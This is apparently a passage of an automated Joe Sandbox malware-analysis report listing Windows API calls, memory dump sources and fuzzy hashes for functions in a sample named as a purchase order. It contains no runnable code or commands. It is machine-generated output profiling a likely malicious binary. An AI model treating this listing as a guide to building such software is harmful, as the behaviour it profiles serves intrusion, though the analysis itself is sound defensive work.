                      • Instruction Fuzzy Hash: 04110472A04204BFE7029BA89C08BDE7FADAB04725F144256F926E3391EA708D1487A0
                      APIs
                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AAC657
                      • GetStockObject.GDI32(00000011), ref: 00AAC66B
                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAC675
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CreateMessageObjectSendStockWindow
                      • String ID:
                      • API String ID: 3970641297-0
                      • Opcode ID: cd0be9cb3aa1adf8bfc0a764c1109b7f7402ed822e2092e9bc4befdf5b060aa4
                      • Instruction ID: 1af8fcf3b5fbfd4bded055472f927dd1aae2d50bd31cadbd5b5d7d7dac921673
                      • Opcode Fuzzy Hash: cd0be9cb3aa1adf8bfc0a764c1109b7f7402ed822e2092e9bc4befdf5b060aa4
                      • Instruction Fuzzy Hash: 5B118072501659BFEF128FA49C54EEABB69FF0A364F055215FA04531A0DB32DC60DBA0
                      APIs
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AD354D,?,00AD45D5,?,00008000), ref: 00AD49EE
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00AD354D,?,00AD45D5,?,00008000), ref: 00AD4A13
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AD354D,?,00AD45D5,?,00008000), ref: 00AD4A1D
                      • Sleep.KERNEL32(?,?,?,?,?,?,?,00AD354D,?,00AD45D5,?,00008000), ref: 00AD4A50
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CounterPerformanceQuerySleep
                      • String ID:
                      • API String ID: 2875609808-0
                      • Opcode ID: f34a15d2fe87b273946630412fc20a58bc1c641db69bea542c871593f11091f0
                      • Instruction ID: 54a1a73d882b68ad4a2bc1cd9adc1e7410458dd1079ca20a29da7a0843e2c210
                      • Opcode Fuzzy Hash: f34a15d2fe87b273946630412fc20a58bc1c641db69bea542c871593f11091f0
                      • Instruction Fuzzy Hash: 3F112A71D40528EBCF00EFA5DA89AEEBB74FF09751F414056E946B7250CB309560CBA9
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                      • String ID:
                      • API String ID: 3016257755-0
                      • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                      • Instruction ID: 5a298768dd01d6d5aa6baef9219668fd4f0b1840d49f09c394f080420d782c13
                      • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                      • Instruction Fuzzy Hash: AA018C3280464EBBCF125F94DD41DEE3F62BF18350B5A8818FE2859031D232DAB1AB81
                      APIs
                        • Part of subcall function 00AB869D: __getptd_noexit.LIBCMT ref: 00AB869E
                      • __lock.LIBCMT ref: 00AB811F
                      • InterlockedDecrement.KERNEL32(?), ref: 00AB813C
                      • _free.LIBCMT ref: 00AB814F
                      • InterlockedIncrement.KERNEL32(01389A78), ref: 00AB8167
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                      • String ID:
                      • API String ID: 2704283638-0
                      • Opcode ID: c175134ae7fb7ec8ba83929ed950599e415b77af4ed5299fce6966f9a6bb6fc8
                      • Instruction ID: 6f64956d71005e35df8e1536d6f6cd76188472f656fa71ccf4583f5c4addfa20
                      • Opcode Fuzzy Hash: c175134ae7fb7ec8ba83929ed950599e415b77af4ed5299fce6966f9a6bb6fc8
                      • Instruction Fuzzy Hash: BB01D232942621ABDB11AF6CA94A7DD73BCBF05710F040209F41067293DF389A42DBD6
                      APIs
                      • GetWindowRect.USER32(?,?), ref: 00AFDE07
                      • ScreenToClient.USER32(?,?), ref: 00AFDE1F
                      • ScreenToClient.USER32(?,?), ref: 00AFDE43
                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00AFDE5E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ClientRectScreen$InvalidateWindow
                      • String ID:
                      • API String ID: 357397906-0
                      • Opcode ID: a805eca5e8478d444cc78572342309663ab75e1917712fceaff94c1c083ae4b3
                      • Instruction ID: 2bf1f4dce0ecf34be92a3cecd4583d36d35a029955a96178d0cacec0216e4ace
                      • Opcode Fuzzy Hash: a805eca5e8478d444cc78572342309663ab75e1917712fceaff94c1c083ae4b3
                      • Instruction Fuzzy Hash: E9112DB9D00209EFDB41DFA9C8849EEBBF9FB08310F508166E925E3214DB35AA55CF50
                      APIs
                      • __lock.LIBCMT ref: 00AB8768
                        • Part of subcall function 00AB8984: __mtinitlocknum.LIBCMT ref: 00AB8996
                        • Part of subcall function 00AB8984: EnterCriticalSection.KERNEL32(00AB0127,?,00AB876D,0000000D), ref: 00AB89AF
                      • InterlockedIncrement.KERNEL32(DC840F00), ref: 00AB8775
                      • __lock.LIBCMT ref: 00AB8789
                      • ___addlocaleref.LIBCMT ref: 00AB87A7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                      • String ID:
                      • API String ID: 1687444384-0
                      • Opcode ID: 0b920dbacdc0afd447cb745efbd9d65f9893a87499132f4637bddff2ed2279f6
                      • Instruction ID: 5c6e0d6e0a578f4f6a2fa8be79b1cc12f1d3423108042058b74cf60ee96361d6
                      • Opcode Fuzzy Hash: 0b920dbacdc0afd447cb745efbd9d65f9893a87499132f4637bddff2ed2279f6
                      • Instruction Fuzzy Hash: 0C016D72440B00AFD760EF69D905799F7F8FF40325F20890EE4A9872A2CFB4A680CB01
                      APIs
                      • _memset.LIBCMT ref: 00AFE14D
                      • _memset.LIBCMT ref: 00AFE15C
                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B53EE0,00B53F24), ref: 00AFE18B
                      • CloseHandle.KERNEL32 ref: 00AFE19D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memset$CloseCreateHandleProcess
                      • String ID:
                      • API String ID: 3277943733-0
                      • Opcode ID: c6aaf723d8a1a75f6de005ef2900c3baee3e874e6fe7296d367a9e33728716ac
                      • Instruction ID: 720d9048e14cddf1b3ced5491bbadfeb4c58f0b468035663f59de101dcbd9ca3
                      • Opcode Fuzzy Hash: c6aaf723d8a1a75f6de005ef2900c3baee3e874e6fe7296d367a9e33728716ac
                      • Instruction Fuzzy Hash: 26F05EF1940314BFF2105B65AC56FB77AECDB09BD6F404460FE04D62A2DBB68E1096B8
                      APIs
                      • EnterCriticalSection.KERNEL32(?), ref: 00AD9C7F
                        • Part of subcall function 00ADAD14: _memset.LIBCMT ref: 00ADAD49
                      • _memmove.LIBCMT ref: 00AD9CA2
                      • _memset.LIBCMT ref: 00AD9CAF
                      • LeaveCriticalSection.KERNEL32(?), ref: 00AD9CBF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CriticalSection_memset$EnterLeave_memmove
                      • String ID:
                      • API String ID: 48991266-0
                      • Opcode ID: 42c7d91e5af877b26964b8d8ceb25493e4281596f48c5d476d1f41a86d2dbd34
                      • Instruction ID: 5987653c77608abc8222b898d6cff4e509a9cec37b9c7f56ed93f1ce77e675bb
                      • Opcode Fuzzy Hash: 42c7d91e5af877b26964b8d8ceb25493e4281596f48c5d476d1f41a86d2dbd34
                      • Instruction Fuzzy Hash: 26F03A7A200000AFCB016F54EC85A8ABB69EF45360B48C062FE099F217CB31E911DBB5
                      APIs
                        • Part of subcall function 00AAB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00AAB5EB
                        • Part of subcall function 00AAB58B: SelectObject.GDI32(?,00000000), ref: 00AAB5FA
                        • Part of subcall function 00AAB58B: BeginPath.GDI32(?), ref: 00AAB611
                        • Part of subcall function 00AAB58B: SelectObject.GDI32(?,00000000), ref: 00AAB63B
                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00AFE860
                      • LineTo.GDI32(00000000,?,?), ref: 00AFE86D
                      • EndPath.GDI32(00000000), ref: 00AFE87D
                      • StrokePath.GDI32(00000000), ref: 00AFE88B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                      • String ID:
                      • API String ID: 1539411459-0
                      • Opcode ID: 52f6c97f9a504e64f93cd04d545189185239c114e7bcdeeaeb3794678c8ac0ff
                      • Instruction ID: 88d76814d27a50def49ceb76c25ff75634059add615cc06fc72a55cd73476de2
                      • Opcode Fuzzy Hash: 52f6c97f9a504e64f93cd04d545189185239c114e7bcdeeaeb3794678c8ac0ff
                      • Instruction Fuzzy Hash: C4F05E31001259BBDB126F94AC0DFDE3F99AF0A311F448141FA11660E1CB795661DFE5
                      APIs
                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ACD640
                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00ACD653
                      • GetCurrentThreadId.KERNEL32 ref: 00ACD65A
                      • AttachThreadInput.USER32(00000000), ref: 00ACD661
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                      • String ID:
                      • API String ID: 2710830443-0
                      • Opcode ID: b523d696d34217a22061f9aa291002995b66b15f7efab47e338773a8d9e3ae1b
                      • Instruction ID: 485ece6d42f1f6f3df12c0afd2bed2512d24656aa7a08705c3329781bc43afdd
                      • Opcode Fuzzy Hash: b523d696d34217a22061f9aa291002995b66b15f7efab47e338773a8d9e3ae1b
                      • Instruction Fuzzy Hash: F4E0C971541228BADB215FA29C0DFDB7F6CEF567A1F808025BA0D96060DF759590CBA0
                      APIs
                      • GetCurrentThread.KERNEL32 ref: 00ACBE01
                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00ACB9C9), ref: 00ACBE08
                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00ACB9C9), ref: 00ACBE15
                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00ACB9C9), ref: 00ACBE1C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CurrentOpenProcessThreadToken
                      • String ID:
                      • API String ID: 3974789173-0
                      • Opcode ID: 865af6ef017bb55c79ec7ae4457e641a088eeaef8b75850833a7f4d0af74c302
                      • Instruction ID: 389df40b52acfa79ba0525d105bf0b0b52c7892c17ba9b70e076a09f75c2e7fd
                      • Opcode Fuzzy Hash: 865af6ef017bb55c79ec7ae4457e641a088eeaef8b75850833a7f4d0af74c302
                      • Instruction Fuzzy Hash: 7DE08632641221ABD7105FB1AC0DFD73BA8EF58B92F01C818F241DB040DB388441C765
                      APIs
                      • GetSysColor.USER32(00000008), ref: 00AAB0C5
                      • SetTextColor.GDI32(?,000000FF), ref: 00AAB0CF
                      • SetBkMode.GDI32(?,00000001), ref: 00AAB0E4
                      • GetStockObject.GDI32(00000005), ref: 00AAB0EC
                      • GetWindowDC.USER32(?,00000000), ref: 00B0ECFA
                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B0ED07
                      • GetPixel.GDI32(00000000,?,00000000), ref: 00B0ED20
                      • GetPixel.GDI32(00000000,00000000,?), ref: 00B0ED39
                      • GetPixel.GDI32(00000000,?,?), ref: 00B0ED59
                      • ReleaseDC.USER32(?,00000000), ref: 00B0ED64
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                      • String ID:
                      • API String ID: 1946975507-0
                      • Opcode ID: 0112e45d84ee05934ac1ae0a8bc1bbe55cedf0fa08762686c1131e7625071da1
                      • Instruction ID: 3c40fd757340a1295701f1395ef0eb55a5514f532a0f6389c054ce41c737104d
                      • Opcode Fuzzy Hash: 0112e45d84ee05934ac1ae0a8bc1bbe55cedf0fa08762686c1131e7625071da1
                      • Instruction Fuzzy Hash: E1E0ED31500240BEEB215F74AC497D87F61EB56335F54C366F779690E2CB728590DB11
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CapsDesktopDeviceReleaseWindow
                      • String ID:
                      • API String ID: 2889604237-0
                      • Opcode ID: dfdcc2ab53e22c266c5e50cbe3a3af508bf2214e3d9e9cb760317f3e1f8737e3
                      • Instruction ID: a8506b95f566c5c8715c47eacf0d1418c8a7ccd072f55f08fe74fead2a896708
                      • Opcode Fuzzy Hash: dfdcc2ab53e22c266c5e50cbe3a3af508bf2214e3d9e9cb760317f3e1f8737e3
                      • Instruction Fuzzy Hash: AFE092B5540204EFDB009F709888AA97FE9EB4C361F51C816F94A8B291EFB999819B50
                      APIs
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00ACC071
                      • UnloadUserProfile.USERENV(?,?), ref: 00ACC07D
                      • CloseHandle.KERNEL32(?), ref: 00ACC086
                      • CloseHandle.KERNEL32(?), ref: 00ACC08E
                        • Part of subcall function 00ACB850: GetProcessHeap.KERNEL32(00000000,?,00ACB574), ref: 00ACB857
                        • Part of subcall function 00ACB850: HeapFree.KERNEL32(00000000), ref: 00ACB85E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                       • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                      • String ID:
                      • API String ID: 146765662-0
                      • Opcode ID: e8793eb0344e32e7f795d6876b4fb89d6dd10c0574b119a8eec1235a09bda32b
                      • Instruction ID: 67be32c055e53d763f123d81b83d6cc449ed4f6c6a19e8b012e5340378d35313
                      • Opcode Fuzzy Hash: e8793eb0344e32e7f795d6876b4fb89d6dd10c0574b119a8eec1235a09bda32b
                      • Instruction Fuzzy Hash: 85E0B636104006BBDB026FA5ED09899FB2AFF893213508225F625925B0CF32A835EB90
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CapsDesktopDeviceReleaseWindow
                      • String ID:
                      • API String ID: 2889604237-0
                      • Opcode ID: 2e1827d86028903181ddd0d80985c7d6b0eef0526b450503e4a862881bdf8a74
                      • Instruction ID: d130eb19fe022b0d8f1e3afac55dcab2b4d2d0925db8b24ddb508c3bf435e453
                      • Opcode Fuzzy Hash: 2e1827d86028903181ddd0d80985c7d6b0eef0526b450503e4a862881bdf8a74
                      • Instruction Fuzzy Hash: 1DE0B6B5940304EFDB009F70DC4C6A97BE9EB4C361F51C815F94ACB251DFB999818B50
                      APIs
                      • __getptd_noexit.LIBCMT ref: 00AB4C3E
                        • Part of subcall function 00AB86B5: GetLastError.KERNEL32(?,00AB0127,00AB88A3,00AB4673,?,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB86B7
                        • Part of subcall function 00AB86B5: __calloc_crt.LIBCMT ref: 00AB86D8
                        • Part of subcall function 00AB86B5: GetCurrentThreadId.KERNEL32 ref: 00AB8701
                        • Part of subcall function 00AB86B5: SetLastError.KERNEL32(00000000,00AB0127,00AB88A3,00AB4673,?,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB8719
                      • CloseHandle.KERNEL32(?,?,00AB4C1D), ref: 00AB4C52
                      • __freeptd.LIBCMT ref: 00AB4C59
                      • ExitThread.KERNEL32 ref: 00AB4C61
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                      • String ID:
                      • API String ID: 408300095-0
                      • Opcode ID: d35613538db0a28c6f67c9e7ccabb2c859134fc69596420858bf1ce1f378ac61
                      • Instruction ID: d9b5a92be6f9cb4aa5b5e5e36ed9703731b689fe82313cd04cab6cd60ca95547
                      • Opcode Fuzzy Hash: d35613538db0a28c6f67c9e7ccabb2c859134fc69596420858bf1ce1f378ac61
                      • Instruction Fuzzy Hash: 20D0A731402A519BC53527249E0F6CD375C5F02F26B018304E535160E3CF248C158695
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: >$DEFINE
                      • API String ID: 4104443479-1664449232
                      • Opcode ID: 45ac7d665f12590a176ef06c1a2f40bdc064eced800e7bb99adadd18ee082041
                      • Instruction ID: 806c7863620b6bb0501ec060b98ac1946c11f3725342597ee90c7a9ebaf1b32c
                      • Opcode Fuzzy Hash: 45ac7d665f12590a176ef06c1a2f40bdc064eced800e7bb99adadd18ee082041
                      • Instruction Fuzzy Hash: 25124875A0021ADFCF24CF58C490AEDB7F1FF48310F65819AE859AB355E734A991CB90
                      APIs
                      • OleSetContainedObject.OLE32(?,00000001), ref: 00ACECA0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmp
